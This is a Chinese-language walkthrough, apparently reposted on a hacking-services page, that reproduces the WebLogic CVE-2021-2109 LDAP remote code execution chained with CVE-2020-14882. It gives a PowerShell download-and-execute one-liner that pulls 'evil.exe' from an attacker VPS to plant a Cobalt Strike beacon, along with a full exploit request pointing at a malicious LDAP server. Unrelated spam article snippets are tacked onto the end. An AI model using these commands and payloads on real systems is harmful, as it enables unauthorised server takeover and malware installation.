weblogicCVE-2021-2109ldap远程代码执行漏洞复现(从weblogic环境搭建到...

访客4年前关于黑客接单570

环境搭建

参考:

https://blog.csdn.net/zhlh_xt/article/details/76436807

下载链接:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html

1613575474_602d3532d4d9ee878cc80.png!small

1613575481_602d3539e85c58a3ec6cc.png!small

开始安装:

| Java -D64 -jar wls1036_generic.jar |
1613575490_602d3542b66e52137acd0.png!small

1613575497_602d354952fb7e7a0d9cc.png!small

1613575502_602d354e3a60b8e8b114b.png!small

1613575509_602d35550eaef07c514f7.png!small

1613575515_602d355b135f813cbf851.png!small

1613575520_602d356013690514c1178.png!small

1613575525_602d35652a5df64286a4c.png!small

1613575529_602d35690ad81071604ab.png!small

1613575534_602d356e37e5752ff60a4.png!small

1613575538_602d3572a17d65ff41f66.png!small

1613575544_602d35784124400695a40.png!small

1613575549_602d357d169f15dcbca84.png!small

1613575554_602d35827ba7cc110159a.png!small

1613575559_602d35872b5dc1675214c.png!small

1613575564_602d358ca96360a28ef44.png!small

1613575572_602d3594bef987231aac7.png!small

1613575582_602d359e21337ff15fcfe.png!small

1613575588_602d35a40714692624856.png!small

| C:\Oracle\Middleware?projects\domains |
设置密码

1613575597_602d35ad5444aef8668da.png!small

1613575603_602d35b3ea15831106442.png!small

1613575609_602d35b95612dd3c3c27f.png!small

1613575614_602d35be8487bce754930.png!small

1613575621_602d35c5b196191feac12.png!small

1613575627_602d35cb8388f2632a37c.png!small

1613575633_602d35d1182cd8edc221e.png!small

1613575638_602d35d6b30a7954992dd.png!small

搭建完毕

访问目标:

1613575645_602d35dd2c23f022bd08d.png!small

漏洞复现

准备工作:

ldap包下载 https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip
构造java包进行编译:Request.java

如想上线CS把calc.exe修改为下载cs木马并执行命令

cd https://www.freebuf.com/Windows/Temp && powershell (new-object System.Net.WebClient).DownloadFile('http://vps/123.jpg','evil.exe') & evil.exe

进行编译:注意目标环境是什么jdk就用什么jdk版本进行编译

1613575670_602d35f6a7fdd173a2af2.png!small

编译好class包后上传到vps

开启http服务,下面放编译好的class包

1613575708_602d361c69de81d4a3b40.png!small

用下载好的marshalsec包开启ldap服务:

1613575713_602d3621e32a6a8f6f4cc.png!small

通过burp请求:配合
CVE-2021-2109(ldap远程代码执行)和CVE-2020-14882(未授权访问)

1613575720_602d3628d06f3e447de8e.png!small

完整数据包:

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22;ldap://vps:5005/Request;AdminServer%22) |

cs接收shell

1613575730_602d3632b1d755cfa99a5.png!small

限制条件:目标可以出网,能够成功构造和发送包

相关文章

《江偌陆淮深陆芸》抖音小说+(全文在线阅读)

凤凰网科技讯北京时间1月26日消息,据路透社报道: 【小说】【江偌陆淮深陆芸】最新章节_无弹窗全文阅读,txt电子书下载,全章节小说 在【纯文阁】这个微信公众号,回复书号:5680,阅读全章节。摘选以...

中国新蛋网任命周昭武为新任总裁

新蛋中国区实行高级副总裁、中国新蛋网首席总裁周昭武 凤凰科技讯 5月11日信息,新蛋中国此前对外开放公布,宣布任职新任中国地区实行高级副总裁周昭武(Mike Chou)老先生担任中国新蛋网首席...

超强风暴席卷希腊 民ic公司防部门发布恶劣天气警报

  中新网1月28日电 据希腊《中希时报》报道,近日,强风和雨雪天气在希腊全境肆虐。希腊国家气象局已发布了恶劣天气警报,民防部总秘书帕帕约奥吉欧还表示,公民应遵照媒体通告及当局指示,谨慎规划出行。...

鲁班发明了什么东西?鲁班的十大发明图片

鲁班发明了什么东西?鲁班的十大发明图片

时钟拨回到2000多年前,中国历史上有一位大师级匠人已用毕生成就诠释了这一精神。他,就是鲁班。 细数传说中那些鲁班的发明创造,向“工匠精神”致敬! 1、锯子 相传有一次鲁班上山砍树,不小心被...

怎么白手起家赚钱?穷人白手起家的技巧及秘密

怎么白手起家赚钱?穷人白手起家的技巧及秘密

在现代这个社会,各种成本越来越高以及资源整合的难度越来越大。所以,穷人要想白手起家,创业起家,其实是一件非常难的事情。所以,对于很多农村出来的人来说,创业,根本不可能作为第一选择。而只有打工,才是大多...

HOSFAIR咖啡加盟店赚钱吗?赚钱能力不容小觑

HOSFAIR咖啡加盟店赚钱吗?赚钱能力不容小觑

此刻的糊口程度不绝的晋升了,那么各人创业做加盟长短常风行的,那么此刻有着越来越多的人想要开一家咖啡店,因为饮品行业的成长长短常繁荣的,这样的成长形势长短常有利于咖啡饮品成长的,可是好的咖啡加盟品牌加盟...